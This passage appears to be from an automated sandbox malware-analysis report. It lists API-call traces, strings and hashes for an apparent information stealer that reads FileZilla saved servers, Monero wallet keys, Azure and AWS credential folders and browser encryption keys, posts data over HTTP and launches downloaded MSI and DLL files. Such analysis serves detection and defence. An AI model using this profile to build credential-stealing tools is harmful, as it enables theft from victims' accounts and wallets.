                            • lstrcat.KERNEL32(?,00000000), ref: 00600617
                            • lstrcat.KERNEL32(?,00611698), ref: 00600626
                            • lstrcat.KERNEL32(?,0061169C), ref: 00600635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 5410cd5d052a8bae4d42ee306ddd392e1d9df2e103f341d0fdabc464226c716e
                            • Instruction ID: bacb792292a95c2b8acdf137c0c8cf1ee4404134e799b08e114f010015383e9f
                            • Opcode Fuzzy Hash: 5410cd5d052a8bae4d42ee306ddd392e1d9df2e103f341d0fdabc464226c716e
                            • Instruction Fuzzy Hash: 0CD13C71950208ABDB48FBE0DD96EEF737ABF54340F448418F202A60D1EF75AA46CB65
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F59F8
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0140E500,00000000,?,01409AF8,00000000,?,00611A1C), ref: 005F5E71
                            • lstrlen.KERNEL32(00000000), ref: 005F5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005F5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F5E9A
                            • lstrlen.KERNEL32(00000000), ref: 005F5EAF
                            • lstrlen.KERNEL32(00000000), ref: 005F5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 005F5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005F5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FBD
                            • HttpOpenRequestA.WININET(00000000,0140E490,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F5BF8
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • InternetCloseHandle.WININET(00000000), ref: 005F5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: bfaba6e1d64ef12523755fdf5cbe5e1b5794fcd8a0c96e82a0e036963a200f64
                            • Instruction ID: 791f9b0269fa15582d0b8d6de22fd23bbae3fdf6d54c90ed097628a7c8307ae7
                            • Opcode Fuzzy Hash: bfaba6e1d64ef12523755fdf5cbe5e1b5794fcd8a0c96e82a0e036963a200f64
                            • Instruction Fuzzy Hash: 55122D71960218AADB59EBE0DC95FEFB33ABF54740F40419DB106620D1EF702A4ACF69
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005FD0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005FD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD208
                            • lstrcat.KERNEL32(?,00611478), ref: 005FD217
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD22A
                            • lstrcat.KERNEL32(?,0061147C), ref: 005FD239
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD24C
                            • lstrcat.KERNEL32(?,00611480), ref: 005FD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD26E
                            • lstrcat.KERNEL32(?,00611484), ref: 005FD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD290
                            • lstrcat.KERNEL32(?,00611488), ref: 005FD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD2B2
                            • lstrcat.KERNEL32(?,0061148C), ref: 005FD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 005FD2D4
                            • lstrcat.KERNEL32(?,00611490), ref: 005FD2E3
                              • Part of subcall function 0060A820: lstrlen.KERNEL32(005F4F05,?,?,005F4F05,00610DDE), ref: 0060A82B
                              • Part of subcall function 0060A820: lstrcpy.KERNEL32(00610DDE,00000000), ref: 0060A885
                            • lstrlen.KERNEL32(?), ref: 005FD32A
                            • lstrlen.KERNEL32(?), ref: 005FD339
                              • Part of subcall function 0060AA70: StrCmpCA.SHLWAPI(01408800,005FA7A7,?,005FA7A7,01408800), ref: 0060AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 005FD3B4
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 62140cb9a5110bcb3b2baf535ba19283fded3e526f3e5b2c9ee74e3c1f79e262
                            • Instruction ID: 39886db490dfa0c1955d7d5e1ba0f5eee9da23515d311b182b8c46295ea0e419
                            • Opcode Fuzzy Hash: 62140cb9a5110bcb3b2baf535ba19283fded3e526f3e5b2c9ee74e3c1f79e262
                            • Instruction Fuzzy Hash: EDE11C71950208ABCB4CEBE0DD96EEF737ABF64340F104558F147A60D1EE35AA09CB66
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0140CEB0,00000000,?,0061144C,00000000,?,?), ref: 005FCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005FCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 005FCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005FCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005FCAD9
                            • StrStrA.SHLWAPI(?,0140CE68,00610B52), ref: 005FCAF7
                            • StrStrA.SHLWAPI(00000000,0140CDF0), ref: 005FCB1E
                            • StrStrA.SHLWAPI(?,0140D358,00000000,?,00611458,00000000,?,00000000,00000000,?,01408940,00000000,?,00611454,00000000,?), ref: 005FCCA2
                            • StrStrA.SHLWAPI(00000000,0140D138), ref: 005FCCB9
                              • Part of subcall function 005FC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC871
                              • Part of subcall function 005FC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC87C
                            • StrStrA.SHLWAPI(?,0140D138,00000000,?,0061145C,00000000,?,00000000,01408820), ref: 005FCD5A
                            • StrStrA.SHLWAPI(00000000,01408A40), ref: 005FCD71
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B46), ref: 005FC943
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B47), ref: 005FC957
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B4E), ref: 005FC978
                            • lstrlen.KERNEL32(00000000), ref: 005FCE44
                            • CloseHandle.KERNEL32(00000000), ref: 005FCE9C
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: f1ee126b7cde97d335d0704415f5e60457a4b4fe38b00e1045fa1d515d59bbbf
                            • Instruction ID: e8af78458f10e7c5bdba28b4fac9527a921152fa70f15e36c649ebb340bc4991
                            • Opcode Fuzzy Hash: f1ee126b7cde97d335d0704415f5e60457a4b4fe38b00e1045fa1d515d59bbbf
                            • Instruction Fuzzy Hash: 12E10A71950208ABDB48EBE0DC96FEFB77AAF54340F00815DF106661D1EF346A4ACB69
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • RegOpenKeyExA.ADVAPI32(00000000,0140ABC0,00000000,00020019,00000000,006105B6), ref: 006083A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00608426
                            • wsprintfA.USER32 ref: 00608459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608499
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: c77666eb3818ae3d980c5d94efc36f6b3c5ee74301ef142dbb185760818c477c
                            • Instruction ID: 4dcb0b4690e554d1980c33ff733334b7c8908c88b5af13eae7865e3831c67348
                            • Opcode Fuzzy Hash: c77666eb3818ae3d980c5d94efc36f6b3c5ee74301ef142dbb185760818c477c
                            • Instruction Fuzzy Hash: FA813D71951218AFEB68DB90CC85FEBB7B9FF48700F008698E149A6180DF716B85CF95
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00604DCD
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 0060492C
                              • Part of subcall function 00604910: FindFirstFileA.KERNEL32(?,?), ref: 00604943
                            • lstrcat.KERNEL32(?,00000000), ref: 00604E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00604E59
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                              • Part of subcall function 00604910: FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                              • Part of subcall function 00604910: FindClose.KERNEL32(000000FF), ref: 00604B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00604EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00604EE5
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 006049B0
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,006108D2), ref: 006049C5
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 006049E2
                              • Part of subcall function 00604910: PathMatchSpecA.SHLWAPI(?,?), ref: 00604A1E
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,0140E540), ref: 00604A4A
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,00610FF8), ref: 00604A5C
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,?), ref: 00604A70
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,00610FFC), ref: 00604A82
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,?), ref: 00604A96
                              • Part of subcall function 00604910: CopyFileA.KERNEL32(?,?,00000001), ref: 00604AAC
                              • Part of subcall function 00604910: DeleteFileA.KERNEL32(?), ref: 00604B31
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 8a40b5a59e550acb154e8379522c7068b74687b757607c9e100ce57a9251a29a
                            • Instruction ID: 51a49cc06037d3f6065c53549d29911bde00a64f13c7d8e1c23549a4e48a6d76
                            • Opcode Fuzzy Hash: 8a40b5a59e550acb154e8379522c7068b74687b757607c9e100ce57a9251a29a
                            • Instruction Fuzzy Hash: 7A41B6BA94030867CB54F770DC47FEE7339AB64701F0049587685660C1EDB59BC9CB92
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0060906C
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: d13d7e5c20c23bfc8a4c610557e5c61ff0b4ddc489abb1400cd0608f265b24e7
                            • Instruction ID: 15546eac6c6e5539e59742dc4c6c350df80c84af1ca58784b83cdf709e5a938c
                            • Opcode Fuzzy Hash: d13d7e5c20c23bfc8a4c610557e5c61ff0b4ddc489abb1400cd0608f265b24e7
                            • Instruction Fuzzy Hash: FC710F71950208EBDB08EFE4DC89FEEB7B9BF88700F108518F655A7290DB75A905CB61
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006031C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0060335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006034EA
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 11acb0c8cbdd02118cf76125a9d3be87f9a51f096a9ddfe9bd8a7b1b546b2fa1
                            • Instruction ID: bf8a010623982e30b19507ac0f113856399dd5a0351b1e8fa901ad5958e85637
                            • Opcode Fuzzy Hash: 11acb0c8cbdd02118cf76125a9d3be87f9a51f096a9ddfe9bd8a7b1b546b2fa1
                            • Instruction Fuzzy Hash: 7B120C718902089ADB4DEBE0CC92FEFB73AAF54340F50815DE506661D1EF702B4ACB5A
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F6280: InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                              • Part of subcall function 005F6280: StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                              • Part of subcall function 005F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                              • Part of subcall function 005F6280: HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                              • Part of subcall function 005F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                              • Part of subcall function 005F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605318
                            • lstrlen.KERNEL32(00000000), ref: 0060532F
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00605364
                            • lstrlen.KERNEL32(00000000), ref: 00605383
                            • lstrlen.KERNEL32(00000000), ref: 006053AE
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: d2d065f1b8e45969484ae42904a133efdf972342993c7e6be5d5eb88ac1e6273
                            • Instruction ID: 01b1a093e19fc62cd9cb3f21ee9b3e9dff47fdc16341fe2bfec6fc69ebf3cd51
                            • Opcode Fuzzy Hash: d2d065f1b8e45969484ae42904a133efdf972342993c7e6be5d5eb88ac1e6273
                            • Instruction Fuzzy Hash: B6511B309502089BCB9CEFA0CD96EEF777AAF54340F508018E9065A1D1EF346B46CB66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 8db862d865f0246663dd2660de8184ab36086e48d3bbf71d8a8818e68480de78
                            • Instruction ID: cacfbd884277180768222a4762ba334a8a435372467b964ea402049f7c944ae7
                            • Opcode Fuzzy Hash: 8db862d865f0246663dd2660de8184ab36086e48d3bbf71d8a8818e68480de78
                            • Instruction Fuzzy Hash: 5FC193B59402089BCB58EF60DC89FEB777ABF64300F00459CF50A672C1EA70AA85CF95
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006042EC
                            • lstrcat.KERNEL32(?,0140DB48), ref: 0060430B
                            • lstrcat.KERNEL32(?,?), ref: 0060431F
                            • lstrcat.KERNEL32(?,0140CEE0), ref: 00604333
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608D90: GetFileAttributesA.KERNEL32(00000000,?,005F1B54,?,?,0061564C,?,?,00610E1F), ref: 00608D9F
                              • Part of subcall function 005F9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005F9D39
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 006093C0: GlobalAlloc.KERNEL32(00000000,006043DD,006043DD), ref: 006093D3
                            • StrStrA.SHLWAPI(?,0140DB00), ref: 006043F3
                            • GlobalFree.KERNEL32(?), ref: 00604512
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                              • Part of subcall function 005F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                              • Part of subcall function 005F9AC0: LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006044A3
                            • StrCmpCA.SHLWAPI(?,006108D1), ref: 006044C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006044D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006044E5
                            • lstrcat.KERNEL32(00000000,00610FB8), ref: 006044F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
